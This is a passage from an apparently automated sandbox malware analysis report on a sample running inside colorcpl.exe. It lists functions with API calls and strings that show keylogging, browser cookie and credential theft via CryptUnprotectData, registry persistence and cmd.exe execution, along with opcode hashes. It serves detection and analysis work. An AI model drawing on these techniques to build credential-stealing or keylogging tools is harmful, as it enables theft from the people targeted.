                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0466C757
                                                                                                                              Strings
                                                                                                                              • User Data\Default\Network\Cookies, xrefs: 0466C6D2
                                                                                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0466C704
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExistsFilePath
                                                                                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                              • API String ID: 1174141254-1980882731
                                                                                                                              • Opcode ID: d2120446c45b7ca262d0ba1f1df85ac9d04244085d08344ec9ee81be1e29c0c6
                                                                                                                              • Instruction ID: 6995a14f91eed5204d62102ea4859c6710b2c29c2716d28df4966384060d35ee
                                                                                                                              • Opcode Fuzzy Hash: d2120446c45b7ca262d0ba1f1df85ac9d04244085d08344ec9ee81be1e29c0c6
                                                                                                                              • Instruction Fuzzy Hash: 8721FEB19001199ADB04FBA5DC65CFEBB79EE51619B40012DE543A3190FF30BA4ACAD8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0466B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0466B172
                                                                                                                                • Part of subcall function 0466B164: wsprintfW.USER32 ref: 0466B1F3
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0466AF6E
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0466AF7A
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0466A295,?,00000000,00000000), ref: 0466AF86
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                              • String ID: Online Keylogger Started
                                                                                                                              • API String ID: 112202259-1258561607
                                                                                                                              • Opcode ID: 7912674d8b746e2a1ebd4b7079b984a177d3cf578737b725c9e8e72fc1c54701
                                                                                                                              • Instruction ID: e6e2368f1abe0da66111bbbcb38a7cca575f254f4ffabf55ca0dd348f750591d
                                                                                                                              • Opcode Fuzzy Hash: 7912674d8b746e2a1ebd4b7079b984a177d3cf578737b725c9e8e72fc1c54701
                                                                                                                              • Instruction Fuzzy Hash: 66010490B002183AF72076769C8ACBF7E6CCB82498B40005CF54722145F9613C498AF6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04666A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 04666A82
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04666A89
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: CryptUnprotectData$crypt32
                                                                                                                              • API String ID: 2574300362-2380590389
                                                                                                                              • Opcode ID: 05cc3566a618b830d14bd4fc64a96b091dd9332c3cfd3966c6c29783d0513b9c
                                                                                                                              • Instruction ID: 083a71c3fe30872e1b9ce987d3d356f7b616d476ac732d29bd1efd59589e69cc
                                                                                                                              • Opcode Fuzzy Hash: 05cc3566a618b830d14bd4fc64a96b091dd9332c3cfd3966c6c29783d0513b9c
                                                                                                                              • Instruction Fuzzy Hash: 6E018875A04216ABCB18CFADD9549BEBBB8EF55200F04416DE956D3300F675A914CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,04665159), ref: 04665173
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 046651CA
                                                                                                                              • SetEvent.KERNEL32(?), ref: 046651D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                                                                              • String ID: Connection Timeout
                                                                                                                              • API String ID: 2055531096-499159329
                                                                                                                              • Opcode ID: c285403cea261ddc304327bbfdce2ff4480fb75b9dcebe79f2b69d1b8d0bc3a9
                                                                                                                              • Instruction ID: df4e3c5919a51f9f863bfb98e018d4b58b35627d03137d0e070e0301ed1d5c84
                                                                                                                              • Opcode Fuzzy Hash: c285403cea261ddc304327bbfdce2ff4480fb75b9dcebe79f2b69d1b8d0bc3a9
                                                                                                                              • Instruction Fuzzy Hash: 2B01F731A51B40BFE725BB35DC9642BFBD0FF15609304092DD28382B60FA64B441CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0466E833
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw
                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                              • API String ID: 2005118841-1866435925
                                                                                                                              • Opcode ID: bbe4213068a7eed2501fc0edd39904aff61b52416f1c2fcf19f564139b796486
                                                                                                                              • Instruction ID: 5f8fa2685e24cc1fb255bffcd24bf8db4b74c8d8c4a6889077bfa3851ed7851e
                                                                                                                              • Opcode Fuzzy Hash: bbe4213068a7eed2501fc0edd39904aff61b52416f1c2fcf19f564139b796486
                                                                                                                              • Instruction Fuzzy Hash: 6F01D6B46403496FFB14EA94C846FB97B689B30705F00401CA90B95181FA677A02CAA7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04667260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • C:\Windows\SysWOW64\colorcpl.exe, xrefs: 046676C4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                              • API String ID: 0-1707929182
                                                                                                                              • Opcode ID: e8d8bb2dce113654ae744c7a48a5d2a5f324db612597b37457f4b87805c68023
                                                                                                                              • Instruction ID: 79dbc9b18bd612a7d6f87f719b86af884abb7b67be707bfb726622d178d7bad4
                                                                                                                              • Opcode Fuzzy Hash: e8d8bb2dce113654ae744c7a48a5d2a5f324db612597b37457f4b87805c68023
                                                                                                                              • Instruction Fuzzy Hash: 82F0B470F11200ABFF147F6499286A83A55EB9674FF400469E503DA2C4FBA8AC45C6A4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0466DFB1
                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0466DFF0
                                                                                                                                • Part of subcall function 04695640: _Yarn.LIBCPMT ref: 0469565F
                                                                                                                                • Part of subcall function 04695640: _Yarn.LIBCPMT ref: 04695683
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0466E016
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                              • String ID: bad locale name
                                                                                                                              • API String ID: 3628047217-1405518554
                                                                                                                              • Opcode ID: a80f5a41d2e2cb74f970e5c3ef9329f59065e5e6b301837853b8666794388fba
                                                                                                                              • Instruction ID: 7025a66966e2baa4a294e55ad82efe66c70a24e06cc51437f895a6be340b8b8f
                                                                                                                              • Opcode Fuzzy Hash: a80f5a41d2e2cb74f970e5c3ef9329f59065e5e6b301837853b8666794388fba
                                                                                                                              • Instruction Fuzzy Hash: AFF04F32500604AAE728FF60E8659AAB7ACAF10718F50496DA91712490FF75BA19CA9C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04673814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,046D52D8), ref: 0467381F
                                                                                                                              • RegSetValueExW.ADVAPI32(046D52D8,?,00000000,00000001,00000000,00000000,046D52F0,?,0466F823,pth_unenc,046D52D8), ref: 0467384D
                                                                                                                              • RegCloseKey.ADVAPI32(046D52D8,?,0466F823,pth_unenc,046D52D8), ref: 04673858
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateValue
                                                                                                                              • String ID: pth_unenc
                                                                                                                              • API String ID: 1818849710-4028850238
                                                                                                                              • Opcode ID: 11dedd6af4d0c3548a20829bd3b0739fd62e92d3cfae97dbb5efc977ce0d2b50
                                                                                                                              • Instruction ID: 33cf15112d018a7b64fe4fa6b0cf36a40e1a487a279c4b1524fed185ffe51254
                                                                                                                              • Opcode Fuzzy Hash: 11dedd6af4d0c3548a20829bd3b0739fd62e92d3cfae97dbb5efc977ce0d2b50
                                                                                                                              • Instruction Fuzzy Hash: 3DF0A971540118FBEF10AFA1EC05AEA376CEF01751F104118FD0696240FB39AE48DA90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A37E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID: (]?$8_?
                                                                                                                              • API String ID: 269201875-2083683356
                                                                                                                              • Opcode ID: 4c93d15631b6bd86271dfff028913aa9a4ae723767ba7bfe605802b2b693a9a6
                                                                                                                              • Instruction ID: 3a33bfbb23bdb7d59a0a7de220c912e9ae1883a8dc6f251fa731e823d537020a
                                                                                                                              • Opcode Fuzzy Hash: 4c93d15631b6bd86271dfff028913aa9a4ae723767ba7bfe605802b2b693a9a6
                                                                                                                              • Instruction Fuzzy Hash: C8E06C21602E2051F775A57DAC14B9A0985DB91239F110359FC34C63D0FE64ACD15996
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046760EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 04676130
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExecuteShell
                                                                                                                              • String ID: /C $cmd.exe$open
                                                                                                                              • API String ID: 587946157-3896048727
                                                                                                                              • Opcode ID: 5d15885e0d831eeeb36883157c60ef28b8d35a17d3e3c9cbc1b3cfca9c92b822
                                                                                                                              • Instruction ID: fd5aaa9b7c66a99911fe8293c398a75e87c7da9146527109ac7c906998494cf8
                                                                                                                              • Opcode Fuzzy Hash: 5d15885e0d831eeeb36883157c60ef28b8d35a17d3e3c9cbc1b3cfca9c92b822
                                                                                                                              • Instruction Fuzzy Hash: 08E0C0702483446BE704EB64C8A4CBB73EDEA51609B40081CB14792050FF74BD09CA59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • TerminateThread.KERNEL32(0466A27D,00000000,046D52F0,pth_unenc,0466D0B8,046D52D8,046D52F0,?,pth_unenc), ref: 0466B8BB
                                                                                                                              • UnhookWindowsHookEx.USER32(046D50F0), ref: 0466B8C7
                                                                                                                              • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0466B8D5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                                                                              • String ID: pth_unenc
                                                                                                                              • API String ID: 3123878439-4028850238
                                                                                                                              • Opcode ID: 23a3839ba1ab63f28e79ff36bce27da7964443f253a52ad72866aeb4c7473e1f
                                                                                                                              • Instruction ID: 6b252eb9a7c678247f4b0dff2acf13a59caf346e6ffb6db8a75347ef78b23adc
                                                                                                                              • Opcode Fuzzy Hash: 23a3839ba1ab63f28e79ff36bce27da7964443f253a52ad72866aeb4c7473e1f
                                                                                                                              • Instruction Fuzzy Hash: AFE0C2B1344322EFDB240FD0A8888257AEEDA05785304143DF3C392620E6752C44CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 04661414
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0466141B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: GetCursorInfo$User32.dll
                                                                                                                              • API String ID: 1646373207-2714051624
                                                                                                                              • Opcode ID: c863648181e902518b3ddc6e26fdb36aeeee75f5ac5f3a44e7e5a9dc3415ec75
                                                                                                                              • Instruction ID: 670dfbd01c99157ef2e1f63e290528408b377f69baf163c7c7ca1eb277d41378
                                                                                                                              • Opcode Fuzzy Hash: c863648181e902518b3ddc6e26fdb36aeeee75f5ac5f3a44e7e5a9dc3415ec75
                                                                                                                              • Instruction Fuzzy Hash: 38B09BF0D5360097DB005BB4540E8163D64F514701304201DB50691100F77C1845CE54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046614AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 046614B9
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 046614C0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                                                                              • API String ID: 2574300362-1519888992
                                                                                                                              • Opcode ID: 08a9f680783e19578df19078d50e268ad7d0c7a58025afe333bd137f58901463
                                                                                                                              • Instruction ID: 23ed9f6301a21ee47583424a401d51dd1c11b9d239596e2f5406c496439a8cda
                                                                                                                              • Opcode Fuzzy Hash: 08a9f680783e19578df19078d50e268ad7d0c7a58025afe333bd137f58901463
                                                                                                                              • Instruction Fuzzy Hash: 03B092F0DD2200ABCB009FA4A80E82A3ABCE608702300641EBA06D1600FBB858448F91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06729E9C Relevance: 6.4, APIs: 4, Instructions: 370COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                                                                                                              • Instruction ID: f5a73573b3dc757805b14b52c485f3d273d0bfc8cf251bedbd44c8dc837928bd
                                                                                                                              • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                                                                                                              • Instruction Fuzzy Hash: 3FC15971D00367AFDBE4DF79CD44ABA7BB8EF45220F1841AAE6A497250E7318A41CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046AA004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1036877536-0
                                                                                                                              • Opcode ID: 1c2f8d94d364138046bbb34e3d605a48dba68099088dad1340652e4fa8770d15
                                                                                                                              • Instruction ID: 6f039ee34748c37cbced50a138e6fee92850292b6d67cd6933399283d9972076
                                                                                                                              • Opcode Fuzzy Hash: 1c2f8d94d364138046bbb34e3d605a48dba68099088dad1340652e4fa8770d15
                                                                                                                              • Instruction Fuzzy Hash: BCA15A31A00B45AFE721CF98C8907AEBBE5EF61318F18416FD4859B341F239AD61CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0672AD10 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1036877536-0
                                                                                                                              • Opcode ID: 1f5093d525d66a8c77a7a6d48f25c6de002bd88e4623d7d1b5926d2fba8dadfa
                                                                                                                              • Instruction ID: 5f66bb6ecfd8c8c52eff04c967094aab6db2a99325cdfb0bde45df2099e8f6ca
                                                                                                                              • Opcode Fuzzy Hash: 1f5093d525d66a8c77a7a6d48f25c6de002bd88e4623d7d1b5926d2fba8dadfa
                                                                                                                              • Instruction Fuzzy Hash: 67A159B2E103A79FEB61CF18C8917BEBBE5EF55310F1845ADE5959B281C238C942CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B6C1A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 4bb121503855b0c648f22cd5e3547122c2e67cde050c34423435fbf69ae766f5
                                                                                                                              • Instruction ID: aceaf046bc25b285d4f75f4181640108ed660dcf76f8ff89e261b8b864b97bc3
                                                                                                                              • Opcode Fuzzy Hash: 4bb121503855b0c648f22cd5e3547122c2e67cde050c34423435fbf69ae766f5
                                                                                                                              • Instruction Fuzzy Hash: 7241F9716005046AEB256FB8CC446EE3BA4DF46328F14011AF564D6290FA74BC914BE7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7a80c7861b9317ec132871a926f805246d98ca7ae37c4e65b35e863586c6e1c4
                                                                                                                              • Instruction ID: 612262a5cd67049d9ead26836882071bcf9d76c652e5116bd266d87b7907de69
                                                                                                                              • Opcode Fuzzy Hash: 7a80c7861b9317ec132871a926f805246d98ca7ae37c4e65b35e863586c6e1c4
                                                                                                                              • Instruction Fuzzy Hash: 21412772A40A04AFE7249F78CC40BAA7BE8EB84710F10856EF051DB390F671FD658B95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • [Cleared browsers logins and cookies.], xrefs: 0466C0E4
                                                                                                                              • Cleared browsers logins and cookies., xrefs: 0466C0F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                              • API String ID: 3472027048-1236744412
                                                                                                                              • Opcode ID: 92203a29d45702018b28927603754b076efaeb410541263febd0a231ad35d16a
                                                                                                                              • Instruction ID: 796d3812fb5cda5a2497b7ac578f1626eb5560b331457099b8685928a1a02dd3
                                                                                                                              • Opcode Fuzzy Hash: 92203a29d45702018b28927603754b076efaeb410541263febd0a231ad35d16a
                                                                                                                              • Instruction Fuzzy Hash: 2531B2047487C1AEEB126BB454257FA7F824FA3648F48549CA8C70B342F95374489767
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0467C561
                                                                                                                                • Part of subcall function 0467C551: GetWindowTextLengthW.USER32(00000000), ref: 0467C56A
                                                                                                                                • Part of subcall function 0467C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0467C594
                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0466A573
                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0466A5FD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                                                                              • String ID: [ $ ]
                                                                                                                              • API String ID: 3309952895-93608704
                                                                                                                              • Opcode ID: e0c21bae430af7d40efc6a5719351ebcf1a6d32507f490fc7c9bef8ad8551dcf
                                                                                                                              • Instruction ID: d6f05020397d8617fdc5f2253885d1b0200c0c1423a9a10194cebf8bbf6e40de
                                                                                                                              • Opcode Fuzzy Hash: e0c21bae430af7d40efc6a5719351ebcf1a6d32507f490fc7c9bef8ad8551dcf
                                                                                                                              • Instruction Fuzzy Hash: 8F11A2316142005BE614FB74DC519AFB7A9AF52308F40052DE553621E1FF71FE1887DA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A3AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 74b74212c2fd84d6d734e00da0661cb855aa4f928a97c7596fbdaa82720cb03e
                                                                                                                              • Instruction ID: 3173b183e2e34568bb6f5587651bba3348b32cd04ef95e68530a36873e5e2613
